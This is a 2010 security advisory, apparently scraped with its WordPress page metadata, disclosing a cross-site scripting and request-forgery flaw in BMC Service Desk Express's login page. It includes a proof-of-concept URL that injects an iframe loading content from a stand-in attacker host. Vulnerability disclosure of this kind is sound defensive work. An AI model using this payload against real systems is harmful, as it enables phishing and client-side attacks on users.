============================================================================
\nFoofus.net Security Advisory: foofus-20100523
\n============================================================================
\nTitle:\t\tBMC Service Desk Express XSS\/XSRF
\nVersion:\t1.0
\nVendor:\t\tBMC Software
\nRelease Date:\t23.05.2010
\nIssue Status:\tReported To Vendor \/ Patch Issued
\n============================================================================<\/p>\n
1. Summary<\/p>\n
BMC’s Service Desk Express software, is a popular tool for managing IT
\nactions and assets. A cross-site scripting vulnerability was discovered
\nwithin tested versions of this software. Additionally, this issue can be
\nused to perform cross-site request forgery attacks.<\/p>\n
2. Description<\/p>\n
A cross-site scripting vulnerability exists in prelogin.asp. the issue stems
\nfrom the fact that an adversary can control the output of the Authentication
\nError message. This is accomplished by setting the preLoginErrors variable
\nto “errorsoccurred” and injecting code using the Error variable.<\/p>\n
3. Proof of Concept<\/p>\n
The following URL will inject an iframe into the prelogin.asp authentication
\npage.<\/p>\n
http:\/\/helpdesk\/helpdesk\/PreLogin.asp?preLoginErrors=errorsoccured&Error=%3Ciframe%20src=http:\/\/adversary.bad\/foo.php%3E%3C\/iframe%3E<\/p>\n
4. Impact<\/p>\n
Exploiting this attack allows an adversary to inject any type of web-based
\ncontent into the authentication screen to execute client-side attacks or
\nperform social engineering attacks. Often, this software is installed and
\nexposed to the public internet.<\/p>\n
5. Affected Products<\/p>\n
All tested versions of BMC’s Service Desk Express<\/p>\n
6. Solution<\/p>\n
The vendor has been notified and a patch has been released to solve this
\nissue.<\/p>\n","protected":false},"excerpt":{"rendered":"
============================================================================ Foofus.net Security Advisory: foofus-20100523 ============================================================================ Title: BMC Service Desk Express XSS\/XSRF Version: 1.0 Vendor: BMC Software Release Date: 23.05.2010 Issue Status: Reported To Vendor \/ Patch Issued ============================================================================ 1. Summary BMC’s Service Desk Express software, is a popular tool for managing IT actions and assets. A cross-site scripting vulnerability was discovered within tested versions […]<\/p>\n","protected":false},"author":7,"featured_media":0,"parent":273,"menu_order":0,"comment_status":"open","ping_status":"closed","template":"","meta":{"footnotes":""},"class_list":["post-288","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"http:\/\/h.foofus.net\/index.php?rest_route=\/wp\/v2\/pages\/288","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/h.foofus.net\/index.php?rest_route=\/wp\/v2\/pages"}],"about":[{"href":"http:\/\/h.foofus.net\/index.php?rest_route=\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"http:\/\/h.foofus.net\/index.php?rest_route=\/wp\/v2\/users\/7"}],"replies":[{"embeddable":true,"href":"http:\/\/h.foofus.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=288"}],"version-history":[{"count":0,"href":"http:\/\/h.foofus.net\/index.php?rest_route=\/wp\/v2\/pages\/288\/revisions"}],"up":[{"embeddable":true,"href":"http:\/\/h.foofus.net\/index.php?rest_route=\/wp\/v2\/pages\/273"}],"wp:attachment":[{"href":"http:\/\/h.foofus.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=288"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}